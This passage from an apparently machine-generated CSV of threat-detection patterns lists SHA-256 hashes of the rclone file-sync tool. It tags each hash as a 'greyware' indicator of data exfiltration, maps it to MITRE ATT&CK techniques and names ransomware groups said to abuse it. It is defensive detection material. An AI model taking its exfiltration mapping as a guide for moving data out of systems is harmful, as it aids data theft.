"*038e1bfdabf0b75e154beb4957e2ec7b7a99081f8210260b2860d77e27962196*",".{0,1000}038e1bfdabf0b75e154beb4957e2ec7b7a99081f8210260b2860d77e27962196.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*03a9bbe3ff18369f9b538cca705413e15ba977c517bda1dee7c1a7808ce31854*",".{0,1000}03a9bbe3ff18369f9b538cca705413e15ba977c517bda1dee7c1a7808ce31854.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*03ad3912baee1a45e768dac5632eb99edad9056046d3719221e6f0dc1f8e540c*",".{0,1000}03ad3912baee1a45e768dac5632eb99edad9056046d3719221e6f0dc1f8e540c.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*03b104accc26d5aec14088c253ea5a6bba3263ae00fc403737cabceecad9eae9*",".{0,1000}03b104accc26d5aec14088c253ea5a6bba3263ae00fc403737cabceecad9eae9.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*03e927b93128d01f116dd86114a7b5ed52544bab99afd0261f3f739aa4c0543b*",".{0,1000}03e927b93128d01f116dd86114a7b5ed52544bab99afd0261f3f739aa4c0543b.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*045e70715b2261bdbc9e14332b0062b81b71d71a83bde714df7e3caa2615efdc*",".{0,1000}045e70715b2261bdbc9e14332b0062b81b71d71a83bde714df7e3caa2615efdc.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*04965584331eefc46ddb5d667ce123b20a91ae7f275bcda944e16b6f8d17b0d0*",".{0,1000}04965584331eefc46ddb5d667ce123b20a91ae7f275bcda944e16b6f8d17b0d0.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*04e2517acc6b8adfdadf0b2891afa83592d8e62bd0477918dd57a74e6066a1c5*",".{0,1000}04e2517acc6b8adfdadf0b2891afa83592d8e62bd0477918dd57a74e6066a1c5.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*059adfef5b44fa060df14ebdb557514592f2286f0baa8c2cdfbe88205fb0879f*",".{0,1000}059adfef5b44fa060df14ebdb557514592f2286f0baa8c2cdfbe88205fb0879f.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*05da3d393653e62a7513d229788b213cc18db0c48bd73872a3bba62c5df40f02*",".{0,1000}05da3d393653e62a7513d229788b213cc18db0c48bd73872a3bba62c5df40f02.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*060277ad974e12419d8e015237356e0111b649f276fafe93a312a2cff24f316a*",".{0,1000}060277ad974e12419d8e015237356e0111b649f276fafe93a312a2cff24f316a.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*0683a8ba741829172c9ba381228cd6b896d8dc729d9cd6f4cf5598ad773d66d2*",".{0,1000}0683a8ba741829172c9ba381228cd6b896d8dc729d9cd6f4cf5598ad773d66d2.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*06b5b646600b63a96135582d1f340d2c6bb47f8bfe344d6fe92126b5781b4f6d*",".{0,1000}06b5b646600b63a96135582d1f340d2c6bb47f8bfe344d6fe92126b5781b4f6d.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*06bae776acf6e1070847f4c14338b7b4d5cee8dc6653a0175a1e8b9415d5dc14*",".{0,1000}06bae776acf6e1070847f4c14338b7b4d5cee8dc6653a0175a1e8b9415d5dc14.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*06cbd308062d112af438defe44814f026c704bc065728a3d96ddc89722d004c4*",".{0,1000}06cbd308062d112af438defe44814f026c704bc065728a3d96ddc89722d004c4.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*06ce61d12eac6b663eed3e8596e6b287cd005521e6d0fdc07d8c69fbfebad7b4*",".{0,1000}06ce61d12eac6b663eed3e8596e6b287cd005521e6d0fdc07d8c69fbfebad7b4.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*06d7ff9363468c6ef78fc7268a3f8369b4061843c592af879970712b70d50222*",".{0,1000}06d7ff9363468c6ef78fc7268a3f8369b4061843c592af879970712b70d50222.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*06d8f708f9342d9a956f9b15d73aba12f586cadcc41d74612f300d7752c825a2*",".{0,1000}06d8f708f9342d9a956f9b15d73aba12f586cadcc41d74612f300d7752c825a2.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*06f41877ff251b061face147f668e9851b1a5d838f34d8dab4fda9b54029644d*",".{0,1000}06f41877ff251b061face147f668e9851b1a5d838f34d8dab4fda9b54029644d.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*071b361f116e77b4ce5007e1964d0a68ff7a8817f43b52bf9941544398462e1c*",".{0,1000}071b361f116e77b4ce5007e1964d0a68ff7a8817f43b52bf9941544398462e1c.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*07295e2f53ed40f3a94be0a8a39ef52d7478b0477567fcf3ffdb6c62cd0ee525*",".{0,1000}07295e2f53ed40f3a94be0a8a39ef52d7478b0477567fcf3ffdb6c62cd0ee525.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*07c23d21a94d70113d949253478e13261c54d14d72023bb14d96a8da5f3e7722*",".{0,1000}07c23d21a94d70113d949253478e13261c54d14d72023bb14d96a8da5f3e7722.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*07c7b73d7f400fd26bb628f35d79690e3c027cd3619b11a2f68b1153b9bd2583*",".{0,1000}07c7b73d7f400fd26bb628f35d79690e3c027cd3619b11a2f68b1153b9bd2583.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*07e190870caede5e3034c7d127d516c1bbd53b0b1b194cc3965b9b7abd29d677*",".{0,1000}07e190870caede5e3034c7d127d516c1bbd53b0b1b194cc3965b9b7abd29d677.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*07f77944b0bf8adafd778c2dd5a04e7bce814e5fb53de3163093c6205082d4b3*",".{0,1000}07f77944b0bf8adafd778c2dd5a04e7bce814e5fb53de3163093c6205082d4b3.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*081242ae9f1c5b9a54ab009aeb7a16872ad049a69c6e62741eab8f0e67649582*",".{0,1000}081242ae9f1c5b9a54ab009aeb7a16872ad049a69c6e62741eab8f0e67649582.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*0823b0c96929973ad48989eb8195d937af62902d98b15ab2d33a83b74d719e2f*",".{0,1000}0823b0c96929973ad48989eb8195d937af62902d98b15ab2d33a83b74d719e2f.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*085cc263f0fad4f18b19f76c28dc70808249bef383f308ff823bfe28cd3a1de4*",".{0,1000}085cc263f0fad4f18b19f76c28dc70808249bef383f308ff823bfe28cd3a1de4.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*08780d6ee4b09412225b966f301ef86b8bc9cd4bb39c79a9ef9a0a30062a4ce7*",".{0,1000}08780d6ee4b09412225b966f301ef86b8bc9cd4bb39c79a9ef9a0a30062a4ce7.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*08dd1192aa3840bd9b1b5f0949f0377d27bca65f4e7dff37ec81daf4599795c3*",".{0,1000}08dd1192aa3840bd9b1b5f0949f0377d27bca65f4e7dff37ec81daf4599795c3.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*08ddaf402175aaeae32e29f98347d5e97b894f549e9c0c9fe1276fb7f2fb5db0*",".{0,1000}08ddaf402175aaeae32e29f98347d5e97b894f549e9c0c9fe1276fb7f2fb5db0.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*08fac0b039b25bd7d18d79fd618ae5b75c49574102d2946db1fc2f275a19ff67*",".{0,1000}08fac0b039b25bd7d18d79fd618ae5b75c49574102d2946db1fc2f275a19ff67.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*090b4b082caa554812f341ae26ea6758b40338836122595d6283c60c39eb5a97*",".{0,1000}090b4b082caa554812f341ae26ea6758b40338836122595d6283c60c39eb5a97.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*09240b41bc7ac8c3ece03ee6262ea8b019cbb3cf191c35fb761d6888eadf5c4f*",".{0,1000}09240b41bc7ac8c3ece03ee6262ea8b019cbb3cf191c35fb761d6888eadf5c4f.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*095b8583d9fb99dc593ffe604e5c40bd57e24b471e8b6cd84fd8cdbd81ae3d04*",".{0,1000}095b8583d9fb99dc593ffe604e5c40bd57e24b471e8b6cd84fd8cdbd81ae3d04.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*09825c8818a296f345bd6296dc4ebbc4df00d11c10580ffc06dd485cb8451fab*",".{0,1000}09825c8818a296f345bd6296dc4ebbc4df00d11c10580ffc06dd485cb8451fab.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
